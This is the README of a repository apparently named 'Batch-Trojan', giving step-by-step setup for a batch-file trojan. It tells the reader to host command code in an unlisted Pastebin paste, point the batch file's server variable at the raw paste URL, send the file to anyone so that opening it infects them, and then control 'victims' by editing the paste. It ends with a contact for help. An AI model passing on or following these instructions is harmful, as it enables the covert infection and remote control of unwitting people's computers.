Executioner55/Batch-Trojan/README.md

 ####  2. Create Pastebin.com Account
 ####  3. Create New Unlisted Paste
 ####  4. Copy and Paste this Code : [Link](https://pastebin.com/TPNfDEu7)
 ####  5. Copy the Url of youre Paste site and change it like this https://pastebin.com/jsdagjj >> https://pastebin.com/raw/jsdagjj now paste this link into the              batch file where it sets the variable Server=LinkHere
+####  6. Send this batch File to anyone, the person only have to open the File and they get Infected.
+####  7. Now Setup is done and you can Control youre Victims via Editing the Paste site and send out Commands!
+####  0. Need Help?
+Contact Me : Executioner#5068